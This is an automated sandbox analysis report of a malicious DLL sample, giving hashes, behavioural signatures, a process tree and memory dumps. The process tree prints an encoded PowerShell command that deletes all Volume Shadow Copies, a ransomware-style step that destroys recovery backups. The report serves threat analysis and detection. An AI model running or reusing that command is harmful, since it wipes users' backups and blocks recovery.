Analysis
-
max time kernel
122s -
max time network
136s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
24-01-2022 00:40
Static task
static1
Behavioral task
behavioral1
Sample
fa52e9a0f3ea72b98d34fd2ebb6f6cf57944e3e5e535add59213f0fc2cb612b9.dll
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
fa52e9a0f3ea72b98d34fd2ebb6f6cf57944e3e5e535add59213f0fc2cb612b9.dll
Resource
win10-en-20211208
General
-
Target
fa52e9a0f3ea72b98d34fd2ebb6f6cf57944e3e5e535add59213f0fc2cb612b9.dll
-
Size
164KB
-
MD5
2fa5c892e8c030dc128a2c94e67a69e3
-
SHA1
8fc5d2fc29fc1a7d0824bbf300f98b26741e7156
-
SHA256
fa52e9a0f3ea72b98d34fd2ebb6f6cf57944e3e5e535add59213f0fc2cb612b9
-
SHA512
70b2287921c7bf5f024c5ec01c0ea2e9464f31241e186b85fed74bf8c67ec7a50738b2e1ab7b019b8b7433e09ed3a071420a86e29294aa0dae30ffd16406b3bb
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\P: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
rundll32.exepowershell.exepid process 2004 rundll32.exe 376 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 376 powershell.exe Token: SeBackupPrivilege 1120 vssvc.exe Token: SeRestorePrivilege 1120 vssvc.exe Token: SeAuditPrivilege 1120 vssvc.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 1140 wrote to memory of 2004 1140 rundll32.exe rundll32.exe PID 1140 wrote to memory of 2004 1140 rundll32.exe rundll32.exe PID 1140 wrote to memory of 2004 1140 rundll32.exe rundll32.exe PID 1140 wrote to memory of 2004 1140 rundll32.exe rundll32.exe PID 1140 wrote to memory of 2004 1140 rundll32.exe rundll32.exe PID 1140 wrote to memory of 2004 1140 rundll32.exe rundll32.exe PID 1140 wrote to memory of 2004 1140 rundll32.exe rundll32.exe PID 2004 wrote to memory of 376 2004 rundll32.exe powershell.exe PID 2004 wrote to memory of 376 2004 rundll32.exe powershell.exe PID 2004 wrote to memory of 376 2004 rundll32.exe powershell.exe PID 2004 wrote to memory of 376 2004 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\fa52e9a0f3ea72b98d34fd2ebb6f6cf57944e3e5e535add59213f0fc2cb612b9.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\fa52e9a0f3ea72b98d34fd2ebb6f6cf57944e3e5e535add59213f0fc2cb612b9.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:376
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:596
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1120
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/376-56-0x000007FEFC151000-0x000007FEFC153000-memory.dmpFilesize
8KB
-
memory/376-57-0x0000000002850000-0x0000000002852000-memory.dmpFilesize
8KB
-
memory/376-59-0x0000000002852000-0x0000000002854000-memory.dmpFilesize
8KB
-
memory/376-60-0x0000000002854000-0x0000000002857000-memory.dmpFilesize
12KB
-
memory/376-58-0x000007FEF3360000-0x000007FEF3EBD000-memory.dmpFilesize
11.4MB
-
memory/376-61-0x000000000285B000-0x000000000287A000-memory.dmpFilesize
124KB
-
memory/2004-55-0x0000000076511000-0x0000000076513000-memory.dmpFilesize
8KB